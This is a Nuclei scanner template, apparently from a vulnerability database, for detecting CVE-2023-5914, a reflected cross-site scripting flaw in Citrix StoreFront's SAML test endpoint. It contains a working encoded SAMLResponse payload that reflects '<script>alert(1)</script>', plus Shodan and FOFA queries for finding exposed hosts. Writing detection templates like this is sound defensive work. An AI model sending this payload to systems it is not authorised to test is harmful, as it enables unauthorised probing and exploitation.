id: CVE-2023-5914
info:
name: Citrix StoreFront - Cross-Site Scripting
author: DhiyaneshDK
severity: medium
description: |
Reflected Cross-Site Scripting issue which is exploitable without authentication. This vulnerability was exploitable through coercing an error message during an XML parsing procedure in the SSO flow.
impact: |
Unauthenticated attackers can inject malicious JavaScript via reflected XSS during XML parsing in the SSO flow, potentially stealing user credentials or session tokens.
remediation: |
Apply Citrix security updates immediately. Update to StoreFront versions 2402, 2203 CU1, 2203 LTSR CU5, 1912 LTSR CU8, or later.
reference:
- https://www.assetnote.io/resources/research/continuing-the-citrix-saga-cve-2023-5914-cve-2023-6184
- https://support.citrix.com/article/CTX583759/citrix-storefront-security-bulletin-for-cve20235914
- https://www.youtube.com/watch?v=t8MeUQrPqec
- https://nvd.nist.gov/vuln/detail/CVE-2023-5914
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-5914
cwe-id: CWE-79
epss-score: 0.73142
epss-percentile: 0.99387
cpe: cpe:2.3:a:cloud:citrix_storefront:*:*:*:*:ltsr:*:*:*
metadata:
max-request: 1
vendor: cloud
product: citrix_storefront
shodan-query:
- html:"/Citrix/StoreWeb"
- http.html:"/citrix/storeweb"
fofa-query: body="/citrix/storeweb"
tags: cve,xss,citrix,storefront,cve2023,cloud,vkev,vuln
http:
- method: POST
path:
- "{{BaseURL}}/Citrix/teststoreAuth/SamlTest"
headers:
Content-Type: application/x-www-form-urlencoded
body: "SAMLResponse=q1YKdvT1CUotLsjPK05VskLhBrhHlSVVOpkkhZebJRs7ZUQahVp6ZkYVp7iUVEUaexUkewTmRhkHmkeGV%2bQk5wXm%2bwZn5yZ5BJr7GPtlJefmlKc4R%2bWluBRnBmSVl0XlWpYFpNvaKtUCAA%3d%3d"
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(content_type, "text/html")'
- 'contains_all(body, "<script>alert(1)</script>", "XmlException")'
condition: and
# digest: 4b0a00483046022100fe02365c1f6d60ed7879b016b55b1ca63e1ef51821d430200cb14abd5b1782c5022100c9af1d17453686abd61dd3c5220a0b3e840333b827b96748b32c5f393a81b2b6:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation